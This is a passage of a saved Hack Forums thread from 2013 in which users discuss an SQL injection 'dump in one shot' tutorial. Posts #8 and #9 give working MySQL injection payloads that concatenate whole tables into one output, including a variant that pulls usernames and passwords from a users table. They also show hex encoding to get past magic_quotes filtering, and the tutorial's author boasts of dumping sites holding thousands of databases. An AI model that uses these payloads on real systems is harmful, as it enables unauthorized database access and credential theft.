cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-03-2013, 04:42 AM <span id="edited_by_33698106"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33698106#pid33698106">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1834414"><span class="group9">Hayd3n</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">L33t Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 10<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1834414"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33698106">Great tutorial, works great for me.</div><div class="post_meta" id="post_meta_33698106"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1834414" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33698106" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33741698" id="pid33741698"></a><table class="tborder" style="margin-top: 5px; " id="post_33741698" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-05-2013, 05:47 AM <span id="edited_by_33741698"><span class="smalltext">(This post was last modified: 07-05-2013 05:48 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1819381">m4rk0n</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33741698#pid33741698">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1819381"><span class="group2">m4rk0n</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 22<br>Posts: 283<br>Joined: May 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1819381"><strong class="reputation_positive">7</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33741698">Hi
 ajkaro, I love your "dump in one shot" tutorials. I have one question 
though. What would be an elegant solution to dump the whole contents of a
 specific table of a specific database in a nicely formatted was? 
group_concat does not help because of its characters limit.</div><div class="post_meta" id="post_meta_33741698"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1819381" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33741698" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33745628" id="pid33745628"></a><table class="tborder" style="margin-top: 5px; " id="post_33745628" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-05-2013, 09:49 AM <span id="edited_by_33745628"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33745628#pid33745628">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,188<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33745628"><blockquote><cite><span>(07-05-2013 05:47 AM)</span>m4rk0n Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33741698#pid33741698" class="quick_jump">►</a></cite>Hi
 ajkaro, I love your "dump in one shot" tutorials. I have one question 
though. What would be an elegant solution to dump the whole contents of a
 specific table of a specific database in a nicely formatted was? 
group_concat does not help because of its characters limit.</blockquote><br>Use this:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select
 (@) from (select (@:=0x00), (select (@) from INPUT_YOUR_TABLE_HERE 
where (@) in 
(@:=concat(@,'&lt;br&gt;',INPUT_YOUR_COLUMN_NAME_1_HERE,'--&gt;',INPUT_YOUR_COLUMN_NAME_2_HERE))))a)</code></div></div><br>If magic_quotes_gpc is turned on then you will have to use hex values for:<br><span style="color: #FFD700;">&lt;br&gt;</span> = <span style="color: #32CD32;">0x3c62723e</span><br><span style="color: #FFD700;">--&gt;</span> = <span style="color: #32CD32;">0x2d2d3e</span><br><br>Follow my tutorial <a href="http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/" target="_blank">http://zentrixplus.net/forum/index.php?/...-one-shot/</a></div><div class="post_meta" id="post_meta_33745628"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33745628" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33746263" id="pid33746263"></a><table class="tborder" style="margin-top: 5px; " id="post_33746263" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-05-2013, 10:22 AM <span id="edited_by_33746263"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33746263#pid33746263">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1819381"><span class="group2">m4rk0n</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 22<br>Posts: 283<br>Joined: May 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1819381"><strong class="reputation_positive">7</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33746263"><blockquote><cite><span>(07-05-2013 09:49 AM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33745628#pid33745628" class="quick_jump">►</a></cite>Use this:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select
 (@) from (select (@:=0x00), (select (@) from INPUT_YOUR_TABLE_HERE 
where (@) in 
(@:=concat(@,'&lt;br&gt;',INPUT_YOUR_COLUMN_NAME_1_HERE,'--&gt;',INPUT_YOUR_COLUMN_NAME_2_HERE))))a)</code></div></div><br>If magic_quotes_gpc is turned on then you will have to use hex values for:<br><span style="color: #FFD700;">&lt;br&gt;</span> = <span style="color: #32CD32;">0x3c62723e</span><br><span style="color: #FFD700;">--&gt;</span> = <span style="color: #32CD32;">0x2d2d3e</span><br><br>Follow my tutorial <a href="http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/" target="_blank">http://zentrixplus.net/forum/index.php?/...-one-shot/</a></blockquote><br>Thanks
 a lot! I studied all your code from #1, #2, #3 tutorial already and 
learned a lot from it. Now I subscribed to your site. Meanwhile I also 
found some code simiar to yours:<br>(select(@)from(select(@:=0x00),(select(@)from(DB.users)where (@)in(@:=concat(@,0x0a,username,0x3a,password))))x)<br><br>Just
 one more question: isn't it possible to use a code that automaticly 
finds and inserts all the column names and then displays all the data 
belonging to those, so that it is not necessary to do a search for 
columns and input (and maybe hex) them all manually into the code?</div><div class="post_meta" id="post_meta_33746263"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1819381" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33746263" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33746714" id="pid33746714"></a><table class="tborder" style="margin-top: 5px; " id="post_33746714" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-05-2013, 10:48 AM <span id="edited_by_33746714"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33746714#pid33746714">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,188<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33746714"><blockquote><cite><span>(07-05-2013 10:22 AM)</span>m4rk0n Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33746263#pid33746263" class="quick_jump">►</a></cite>Thanks
 a lot! I studied all your code from #1, #2, #3 tutorial already and 
learned a lot from it. Now I subscribed to your site. Meanwhile I also 
found some code simiar to yours:<br>(select(@)from(select(@:=0x00),(select(@)from(DB.users)where (@)in(@:=concat(@,0x0a,username,0x3a,password))))x)</blockquote><br>It is the same as mine, only table name and columns are already hard coded in command...<br><br><blockquote><cite><span>(07-05-2013 10:22 AM)</span>m4rk0n Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33746263#pid33746263" class="quick_jump">►</a></cite>Just
 one more question: isn't it possible to use a code that automaticly 
finds and inserts all the column names and then displays all the data 
belonging to those, so that it is not necessary to do a search for 
columns and input (and maybe hex) them all manually into the code?</blockquote><br>As
 there can be many databases (my record is 9499 databases on site) and 
each database can have many tables and each table can have many columns 
(my record is 253 columns in one table) such command would be quite 
something. <span style="color: #FFD700;">Will you wait for output from such command???</span>
 9000 databases multiplied by (let's say) 10 tables in each database 
multiplied by 200 columns... And if each table has 1000 records you will
 wait few days for output :)</div><div class="post_meta" id="post_meta_33746714"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33746714" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (3):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3590961">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3590961" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3590961&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3590961.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->